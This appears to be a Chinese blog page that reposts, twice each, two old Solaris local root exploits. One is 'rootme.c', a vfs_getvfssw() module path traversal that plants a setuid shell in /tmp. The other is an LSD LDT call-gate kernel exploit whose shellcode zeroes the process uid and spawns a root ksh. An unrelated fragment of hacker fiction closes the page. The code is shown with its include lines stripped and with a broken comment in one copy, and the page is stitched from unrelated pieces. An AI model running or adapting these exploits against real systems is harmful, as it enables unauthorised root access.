2008/02/27 
01:12 
0
241
/* rootme.c - Solaris vfs_getvfssw() Loadable Kernel Module Path Traversal Exploit
*
* Copyright (c) SST 2004 All rights reserved.
*
* Public version
*
* code by Sam and 2004/04/07
*
*
*
* bug find by Dave Aitel
* http://www.immunitysec.com/downloads/solaris_kernel_vfs.sxw.pdf
*
*
* some thanks/greets to:
* sst members, Xfocus Guys, my gf :I
* and everyone else who's KNOW SST ;P
* http://0x557.org
*/
#include
#include
#include
#include
#include
int do_root_me ()
{
if (mkdir("/tmp/sparcv9", 0777) < 0) {
perror ("mkdir");
return -1;
}
system ("cp ./mod /tmp/sparcv9/");
sysfs (GETFSIND, "../../tmp/mod");
return 0;
}
int make_shell ()
{
system ("gcc -o sh sh.c;cp ./sh /tmp/sh;chmod 4755 /tmp/sh");
return 0;
}
int main()
{
pid_t child;
make_shell ();
child = fork ();
if (child == -1)
printf ("Unable to fork\n");
if (child == 0)
do_root_me();
system("/usr/bin/rm -rf /tmp/sparcv9");
printf ("press anykey ");
getchar ();
execl ("/tmp/sh", "/tmp/sh", 0);
return 0;
}
*
* Copyright (c) SST 2004 All rights reserved.
*
* Public version
*
* code by Sam and 2004/04/07
*
*
*
* bug find by Dave Aitel
* http://www.immunitysec.com/downloads/solaris_kernel_vfs.sxw.pdf
*
*
* some thanks/greets to:
* sst members, Xfocus Guys, my gf :I
* and everyone else who's KNOW SST ;P
* http://0x557.org
*/
#include
#include
#include
#include
#include
int do_root_me ()
{
if (mkdir("/tmp/sparcv9", 0777) < 0) {
perror ("mkdir");
return -1;
}
system ("cp ./mod /tmp/sparcv9/");
sysfs (GETFSIND, "../../tmp/mod");
return 0;
}
int make_shell ()
{
system ("gcc -o sh sh.c;cp ./sh /tmp/sh;chmod 4755 /tmp/sh");
return 0;
}
int main()
{
pid_t child;
make_shell ();
child = fork ();
if (child == -1)
printf ("Unable to fork\n");
if (child == 0)
do_root_me();
system("/usr/bin/rm -rf /tmp/sparcv9");
printf ("press anykey ");
getchar ();
execl ("/tmp/sh", "/tmp/sh", 0);
return 0;
}
| 引用(0)
老东西 随便记录一下
/*## copyright LAST STAGE OF DELIRIUM apr 2001 poland *://lsd-pl.net/ #*/
/*## ldt kernel bug #*/
/* the code installs trap call gate descriptor with DPL=3 targeting kernel */
/* code segment selector KCSSEL (DPL=0) in task local descriptor table LDT */
/* through sysi86(SI86DSCR,struct ssd*) system call. */
/* as a result command shell is spawned with effective root user privilege. */
/* NOTE: possible direct jump to user space adr=(unsigned int)&asmcode[21]; */
#include
#include
#include
#include
#include
#include
#include
#define ofs(s,m) (unsigned int)(&(((s*)0)->m))
#define ofskt() (ofs(cpu_t,cpu_thread))
#define ofscr() (ofs(kthread_t,t_cred))
#define ofsid() (ofs(cred_t,cr_uid))
#define adr(a) (char)(a),(char)(a>>8),(char)(a>>16),(char)(a>>24)
#define dsc(d) (char)(d),(char)(d>>8)
char asmcode[]={
0x55, /* pushl %ebp */
0x89,0xe5, /* movl %esp,%ebp */
0xe8,0,0,0,0, /* call */
0x5c, /* popl %esp */
0x83,0xc4,0x0d, /* addl $0x0d,%esp */
0x9a,0,0,0,0,0x44,0, /* lcall $0x44,$0x00000000 */
0xc9, /* leave */
0xc3, /* ret */
0x66,0xb8,dsc(KGSSEL), /* movw $0x????,%ax */
0x8e,0xe8, /* movw %ax,%gs */
0x65,0xa1,adr(ofskt()), /* movl %gs:0x????????,%eax */
0x8b,0x88,adr(ofscr()), /* movl 0x????????(%eax),%ecx */
0x31,0xc0, /* xorl %eax,%eax */
0x89,0x41,ofsid(), /* movl %eax,0x??(%ecx) */
0xca,0x20,0 /* lret $0x20 */
};
main(int argc,char **argv){
unsigned int adr;
ucontext_t uc;struct ssd s;
printf("copyright LAST STAGE OF DELIRIUM apr 2001 poland //lsd-pl.net/\n");
printf("ldt kernel bug for solaris 2.7 2.8 x86\n\n");
getcontext(&uc);
adr=uc.uc_mcontext.gregs[ESP]+12+4+4-(8<<2);
printf("esp=0x%08x adr=0x%08x\n",uc.uc_mcontext.gregs[ESP],adr);
s.bo=adr;
s.sel=0x44;
s.ls=KCSSEL;
s.acc1=GATE_UACC|GATE_386CALL;
s.acc2=8;
sysi86(SI86DSCR,&s);
setuid(getuid());
((void(*)())asmcode)();
execl("/bin/ksh","lsd",0);
}
/*## copyright LAST STAGE OF DELIRIUM apr 2001 poland *://lsd-pl.net/ #*/
/*## ldt kernel bug #*/
/* the code installs trap call gate descriptor with DPL=3 targeting kernel */
/* code segment selector KCSSEL (DPL=0) in task local descriptor table LDT */
/* through sysi86(SI86DSCR,struct ssd*) system call. */
/* as a result command shell is spawned with effective root user privilege. */
/* NOTE: possible direct jump to user space adr=(unsigned int)&asmcode[21]; */
#include
#include
#include
#include
#include
#include
#include
#define ofs(s,m) (unsigned int)(&(((s*)0)->m))
#define ofskt() (ofs(cpu_t,cpu_thread))
#define ofscr() (ofs(kthread_t,t_cred))
#define ofsid() (ofs(cred_t,cr_uid))
#define adr(a) (char)(a),(char)(a>>8),(char)(a>>16),(char)(a>>24)
#define dsc(d) (char)(d),(char)(d>>8)
char asmcode[]={
0x55, /* pushl %ebp */
0x89,0xe5, /* movl %esp,%ebp */
0xe8,0,0,0,0, /* call
0x5c, /* popl %esp */
0x83,0xc4,0x0d, /* addl $0x0d,%esp */
0x9a,0,0,0,0,0x44,0, /* lcall $0x44,$0x00000000 */
0xc9, /* leave */
0xc3, /* ret */
0x66,0xb8,dsc(KGSSEL), /* movw $0x????,%ax */
0x8e,0xe8, /* movw %ax,%gs */
0x65,0xa1,adr(ofskt()), /* movl %gs:0x????????,%eax */
0x8b,0x88,adr(ofscr()), /* movl 0x????????(%eax),%ecx */
0x31,0xc0, /* xorl %eax,%eax */
0x89,0x41,ofsid(), /* movl %eax,0x??(%ecx) */
0xca,0x20,0 /* lret $0x20 */
};
main(int argc,char **argv){
unsigned int adr;
ucontext_t uc;struct ssd s;
printf("copyright LAST STAGE OF DELIRIUM apr 2001 poland //lsd-pl.net/\n");
printf("ldt kernel bug for solaris 2.7 2.8 x86\n\n");
getcontext(&uc);
adr=uc.uc_mcontext.gregs[ESP]+12+4+4-(8<<2);
printf("esp=0x%08x adr=0x%08x\n",uc.uc_mcontext.gregs[ESP],adr);
s.bo=adr;
s.sel=0x44;
s.ls=KCSSEL;
s.acc1=GATE_UACC|GATE_386CALL;
s.acc2=8;
sysi86(SI86DSCR,&s);
setuid(getuid());
((void(*)())asmcode)();
execl("/bin/ksh","lsd",0);
}
| 引用(0)
虽然他感觉到这个人可能是谁,沉思中的她一次再一次的否定的自己的猜测。不管留言风格,和入侵的手段和她所猜想的人有多么的相像可毕竟那是不可能的事情。Rocky 一个已经死去的人怎么可能入侵,不管他身前在网络的世界里像能上帝一样无所不能,但毕竟他是一个死去的人
“请大家放心,首先我们在安全上的投入是其他同行业的几倍,甚至比前三家被黑公司的安全投入的总额还多。我们拥有最先进的技术,可以随时监控每一个网络的请求和访问。我们的密钥体系是经过128 RSA 动态生成的口令,在理论上说他是不可能破解的,如果一定要加一个期限的话那就是“一万年”。
| 引用(0)
